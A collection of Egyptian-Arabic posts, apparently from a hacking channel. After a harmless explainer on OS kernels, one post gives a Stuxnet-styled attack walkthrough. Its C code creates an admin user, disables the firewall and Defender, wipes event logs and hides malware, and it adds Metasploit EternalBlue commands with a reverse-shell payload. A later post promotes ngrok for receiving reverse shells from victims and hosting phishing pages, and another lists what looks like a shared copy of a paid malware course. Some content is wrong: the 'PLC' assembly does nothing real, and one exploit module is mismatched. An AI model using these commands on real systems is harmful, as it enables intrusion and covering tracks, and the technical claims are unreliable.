الكيرنل هو الجزء الأساسي والمحوري في نظام التشغيل وبيعتبر كأنه العقل المدبر أو القلب النابض للنظام هو المسؤول عن إدارة كل حاجة في الكمبيوتر من تشغيل البرامج للتواصل مع الهاردوير زي الكيبورد الماوس الشاشة الهارد ديسك وغيره ببساطة الكيرنل هو الوسيط بين السوفتوير اللي هو البرامج والهاردوير اللي هي الأجهزة المادية لما تطلب من برنامج يفتح ملف البرنامج ده بيطلب من الكيرنل اللي بدوره يتواصل مع الهارد ديسك ويجيب الملف كل العمليات دي بتتم بشكل سلس وانت كمستخدم مش بتحس بيها من أهم وظائف الكيرنل إدارة الموارد زي المعالج الذاكرة ومساحة التخزين إدارة العمليات بيشغل وينهي العمليات البرامج وبيتأكد إن كل عملية بتاخد حقها في استخدام المعالج إدارة الذاكرة بيحدد إيه اللي يتحط في الذاكرة في أي وقت إدارة الأجهزة بيتواصل مع كل الأجهزة الموصلة بالكمبيوتر الأمان بيحمي النظام من العمليات الضارة وبيتحكم في الأذونات اللي بتستخدمها البرامج فيه أنواع مختلفة من الكيرنل زي المونوليثيك كيرنل والمايكروكيرنل وكل نوع ليه مزايا وعيوبه في طريقة إدارة النظام من الناحية العلمية الكيرنل بيتكون من عدة أجزاء رئيسية أهمها النواة اللي بتدير المعالج والذاكرة وتوزيع المهام بين العمليات المختلفة والنواة دي ممكن تبقى من نوعين إما مونوليثيك أو مايكرو وفيه فرق كبير بينهم المونوليثيك كيرنل بيجمع كل وظائف النظام الأساسية في نواة واحدة كبيرة وده بيخليه أسرع في التعامل مع المهام بس لو حصل خطأ في جزء منه ممكن يؤثر على النظام كله أما المايكروكيرنل بيقسم الوظائف الأساسية لأجزاء صغيرة كل جزء مستقل عن التاني وده بيخليه أكثر أمان ومرونة بس بيبقى أبطأ شوية في الأداء مثلاً في المونوليثيك كيرنل زي اللي موجود في لينكس كل مكونات النظام من درايفرات الأجهزة وإدارة الذاكرة والمعالجة بتبقى جزء من الكيرنل نفسه وده بيخليه قادر على التعامل بسرعة مع المهام المختلفة لكن في المقابل بيبقى فيه خطر إن أي خطأ في الكود ممكن يسبب مشاكل كبيرة في النظام كله أما في المايكروكيرنل زي اللي موجود في نظام التشغيل MINIX كل مكون من مكونات النظام زي درايفرات الأجهزة وإدارة الذاكرة بيبقى كأنه برنامج مستقل بيتواصل مع المايكروكيرنل ده بيخلي النظام أكثر أمان ومرونة لإن أي خطأ في مكون معين مش هيأثر على بقية النظام بس بيحتاج وقت أطول في التواصل بين المكونات وده بيأثر على السرعة من الأمثلة اللي بتوضح دور الكيرنل بشكل أكبر لو انت شغال على برنامج وعايز تفتح ملف البرنامج بيبعت طلب للكيرنل الكيرنل بيتواصل مع نظام الملفات على الهارد ديسك ويجيب البيانات المطلوبة ويرجّعها للبرنامج ده بيوضح دور الكيرنل كوسيط بين السوفتوير والهاردوير وازاي بيتحكم في العمليات كلها فيه جزء مهم جداً من الكيرنل هو إدارة الأذونات واللي بتحكم في إيه العمليات اللي مسموح ليها تعمل إيه وإيه اللي مش مسموح ليها ده بيحمي النظام من البرامج الضارة اللي ممكن تحاول تعمل حاجات مش مسموح بيها وبتضمن إن كل عملية ليها الحق في استخدام الموارد اللي محتاجاها بس من غير ما تأثر على العمليات التانية وبس والله😊

شرح اليوم بعنوان (أختراق النوويه الإيرانيه) تابع معي بأختصار Stuxnet كان هجوم سيبراني معقد جدًا استهدف المنشآت النووية الإيرا
+2
شرح اليوم بعنوان (أختراق النوويه الإيرانيه) تابع معي بأختصار Stuxnet كان هجوم سيبراني معقد جدًا استهدف المنشآت النووية الإيرانية في ناتانز. الفيروس ده استغل ثغرات في Windows عشان يخترق النظام وبعد كده يستهدف أجهزة Siemens PLC، اللي هي المسؤولة عن التحكم في أجهزة الطرد المركزي، فلو المهاجم سيطر عليها يقدر يغير العمليات في المنشآت الصناعية المرحلة 1: استغلال الثغرات في النظام (C) أول خطوة هي استغلال ثغرة في النظا. في حالة Stuxnet تم استغلال ثغرات 0-day لكن بنحاكي الاستغلال من خلال كود بلغة C لتوفير صلاحيات إدارية.
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

void exploit_vulnerability() {
    printf("استغلال ثغرة في النظام...\n");
    system("net user attacker /add");  // إضافة مستخدم جديد
    system("net localgroup administrators attacker /add");  // إضافة المستخدم للمجموعة الإدارية
    printf("تم إضافة مستخدم جديد بصلاحيات إدارية.\n");
}

void disable_security() {
    printf("تعطيل الأمان...\n");
    system("netsh advfirewall set allprofiles state off");  // تعطيل الجدار الناري
    system("sc stop WinDefend");  // تعطيل ويندوز ديفندر
    printf("تم تعطيل الأمان بشكل كامل.\n");
}
المرحلة 2: التسلل إلى الأجهزة الصناعية (PLC) هذه المرحلة يا معلم المهاجم يتسلل إلى Siemens PLC اللي بتتحكم في العمليات الصناعية ويقدر يغير أوامر الأجهزة الصناعية بشكل خفي.
section .data
    msg db 'تم تغيير سرعة جهاز الطرد المركزي.', 0

section .text
    global _start

_start:
    mov eax, 0x1234      ; عنوان الجهاز في شبكة SCADA
    mov ebx, 0x5678      ; الأمر لتغيير السرعة
    int 0x80             ; استدعاء النظام

    mov eax, 4           ; استدعاء الكتابة
    mov ebx, 1           ; الشاشة
    mov ecx, msg         ; الرسالة
    mov edx, 30          ; طول الرسالة
    int 0x80             ; استدعاء النظام

    mov eax, 0x4f        ; إيقاف الجهاز
    int 0x80             ; استدعاء النظام

    mov eax, 1           ; الخروج
    xor ebx, ebx         ; حالة الخروج
    int 0x80             ; استدعاء النظام
المرحلة 3: إخفاء الأثر (التخفي) من أهم سمات Stuxnet أنه كان يخفي آثاره تمامًا، سواء من خلال إزالة سجلات النظام أو إخفاء الملفات الضارة
void hide_traces() {
    printf("إخفاء أي آثار للهجوم...\n");
    system("wevtutil cl Security");  // مسح سجل الأمان
    system("wevtutil cl System");    // مسح سجل النظام
    system("wevtutil cl Application");  // مسح سجل التطبيقات
    printf("تم إزالة السجلات بنجاح.\n");

    system("attrib +h C:\\Windows\\System32\\malicious_file.dll");  // إخفاء الملف الضار
    printf("تم إخفاء الملفات الضارة.\n");
}
المرحلة 4: الانتشار التلقائي عبر الشبكة Stuxnet كان بينتشر تلقائيًا عبر الشبكة ومن هنا نقدر نحاكي انتشار الفيروس عبر net send:
void propagate_worm() {
    printf("انتشار الفيروس عبر الشبكة...\n");
    system("net send \\target_computer malicious_payload.exe");
    printf("تم إرسال الفيروس للجهاز الهدف.\n");
}
مثال لـ Exploits مشابهة في Metasploit: في Metasploit في بعض exploits مشابهة التي تستغل ثغرات مشابهة لـ Stuxnet 1. EternalBlue (MS17-010) لاستغلال SMB في Window وهو نفس الاستغلال الذي تم استخدامه في هجمات مثل WannaCry
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
2. LNK vulnerability (CVE-2010-2568) استغل Stuxnet ثغرة LNK في Windows، والتي كانت تسمح بتشغيل كود ضار عند معاينة الملفات.
search cve-2010-2568
use exploit/windows/fileformat/adobe_pdf_embedded_exe
set RHOSTS <target_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
الخلاصة السكربت ده بيحاكي مراحل هجوم Stuxnet المعقد على الأنظمة الصناعية، بدءًا من استغلال الثغرات في النظام ثم التسلل للأجهزة الصناعية (PLC) ومرورًا بـ إخفاء الآثار وانتهاءً بـ الانتشار التلقائي عبر الشبكة. كل خطوة بتتم بعناية علشان المهاجم يقدر يحقق هدفه من غير ما يُكتشف. واتمنا أكون وصلت ليك المعلومه واستفدت ♥ وبس والله😊

Malware Analyst Professional - Level 1 (2023).7z.00271.87 MB

Malware Analyst Professional - Level 1 (2023).7z.0012000.00 MB

Info : https://training.trainsec.net/malware-analyst-professional-level-1 الدورة دي اللي موجودة على موقع Training TrainSec اس
Info : https://training.trainsec.net/malware-analyst-professional-level-1 الدورة دي اللي موجودة على موقع Training TrainSec اسمها Malware Analyst Professional Level 1 ودي دورة متخصصة في تحليل البرمجيات الخبيثة يعني بتعلمك ازاي تكتشف وتحلل المالوير بشكل احترافي ودي حاجة مهمة لأي هكر عايز يطور من نفسه ويزود مهاراته الأمنية الدورة دي بتبدأ معاك من الأساسيات وبتشرحلك بشكل عملي إزاي تتعامل مع أنواع مختلفة من المالوير زي الفيروسات والدود وبرامج التجسس والتروجانات وده مش بس بيكون نظري لكن عملي كمان هتتعلم ازاي تفك شفرات المالوير وتفهم طريقة عمله وده عن طريق استخدام أدوات متخصصة زي IDA Pro و OllyDbg و Wireshark ودي أدوات قوية جدا في تحليل المالوير وفهم طريقة عمله كمان هتتعلم إزاي تكتب تقارير تحليلية مفصلة عن المالوير وده مهم عشان تقدر توصل المعلومات بطريقة مفهومة وواضحة لفريق الأمن السيبراني أو لأي جهة مهتمة بالتحليل اللي عملته التدريب ده كمان بيكون فيه أمثلة حقيقية وحالات عملية بتخليك تواجه التحديات اللي ممكن تقابلك في الواقع وتعرف إزاي تتعامل معاها بشكل احترافي ومش بس كده ده كمان بيخليك تكتسب خبرة عملية ومهارات تحليلية عالية بتخليك تقدر تكتشف الثغرات ونقاط الضعف اللي المالوير بيستغلها وتقدر تحط استراتيجيات لحماية الأنظمة والشبكات منها وكل ده بيساعدك إنك تكون محلل مالوير محترف وتقدر تتعامل مع أي تهديد أمني بثقة وكفاءة ومن الفوائد الكبيرة اللي هتحصل عليها من الدورة دي إنك هتقدر تطور من مهاراتك الشخصية وتزود من فرصك المهنية لأن الشركات النهارده بقت بتدور على الناس اللي عندها خبرة في تحليل المالوير وحماية الأنظمة من التهديدات الأمنية وكمان ده بيفتح لك أبواب جديدة في مجالات زي التحقيقات الجنائية الرقمية والأمن السيبراني بشكل عام في النهاية التدريب ده مش مجرد دورة تعليمية لكن هو استثمار في نفسك وفي مستقبلك المهني وبيساعدك إنك تكون واحد من الخبراء في مجال تحليل المالوير وتكون عندك القدرة على حماية الأنظمة والشبكات من التهديدات المتطورة اللي بتواجهها النهارده الدورات 👇 وبس والله 😊

Ngrok الأداة دي بتسمحلك تفتح بورت ثابت على شبكة الإنترنت حتى لو انت شغال من ورا راوتر أو في شبكة محلية (LAN) وبتعمل الكلام دا عن طريق إنها بتعمل نفق مشفر من جهازك الشخصي لسيرفراتهم على الإنترنت ومن خلال النفق دا بيدوك IP وبورت خارجي تقدر تبعت عليه التبليغ أو تستقبل عليه اتصال عكسي (reverse shell) النسخة المجانية من ngrok بتديك IP وبورت بيتغيروا كل مرة تقفل فيها التيرمنال اللي شغلت منها الأداة يعني لو شغلت بايلود والهدف اتصل بيك لازم التيرمنال تفضل مفتوحة طول ما انت مستني الاتصال لان بمجرد ما تقفل التيرمنال ال IP والبورت هيتغيروا ولو حاولت تستقبل اتصال تاني مش هيجي لأن ال IP والبورت اللي انت شغلت عليهم ngrok في المرة الأولى اتغيروا ومبقوش شغالين النسخة المدفوعة من ngrok بقى بتحللك المشكلة دي إنها بتديك IP وبورت ثابتين مش بيتغيروا حتى لو قفلت التيرمنال ودي ميزة كبيرة جدا خصوصا لو بتستخدم ngrok كجزء من حملة طويلة أو لو بتتعامل مع أهداف بتاخد وقت عشان تتصل بيك من الفوائد المهمة لأداة ngrok برضه إنها بتفتحلك البورت بشكل مباشر على الإنترنت وده بيساعدك في حاجتين أول حاجة إنه بيسهل عملية الريفيرس شيل لأنك ببساطة بتديله IP وبورت من ngrok والهدف بيبعتلك الاتصال العكسي عليه ثاني حاجة بتبقى مفيدة في إنك تقدر تشغل سيرفر محلي على جهازك وتفتحه للإنترنت بشكل مباشر مثلا لو شغال على تطوير ويب وعايز تختبر سيرفر محلي من موبايل أو جهاز خارج شبكتك الأداة دي مفيدة جدا للهكرز اللي محتاجين يبعتوا تبليغ لجهازهم حتى لو هما مش على نفس الشبكة مع الهدف بفضل ngrok هتقدر تخترق أهدافك حتى لو هما برا الشبكة المحلية بتاعتك وكمان لو بتستخدم social engineering وعايز تستضيف صفحات خبيثة على سيرفر محلي وتبعته للضحايا ngrok بيسهللك العملية دي لأنه بيخلي السيرفر المحلي بتاعك مفتوح للضحايا على الإنترنت في الآخر ngrok هي أداة مهمة جدا للهكرز والباحثين الأمنيين اللي محتاجين يتعاملوا مع أهداف عن بعد ويستغلوا الثغرات بشكل عملي سواء عن طريق الريفيرس شيل أو عن طريق تبليغ مباشر رابط الأداة وبس والله 😊